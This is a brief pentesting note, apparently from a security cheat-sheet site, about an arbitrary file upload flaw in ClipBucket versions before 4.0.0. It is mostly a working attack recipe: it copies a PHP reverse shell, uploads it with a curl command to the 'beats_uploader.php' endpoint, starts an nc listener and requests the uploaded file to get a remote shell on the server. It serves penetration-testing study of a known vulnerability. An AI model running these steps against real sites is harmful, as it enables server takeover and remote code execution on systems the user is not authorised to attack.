ClipBucket Pentesting
Last modified: 2023-02-19
Web
ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).
Arbitrary File Upload < v4.0.0
ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell.
1. Prepare Payload
Create a PHP script to reverse shell in local machine.
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
Update $ip and $port with your local ip address and port.
2. Upload the Payload
Next upload the above PHP script to the target website.
curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"
3. Reverse Shell
In local machine, start a listener.
nc -lvnp 4444
Then access to https://example.com/actions/CB_BEATS_UPLOAD_DIR/<uploaded_filename>.php.
We should get a shell.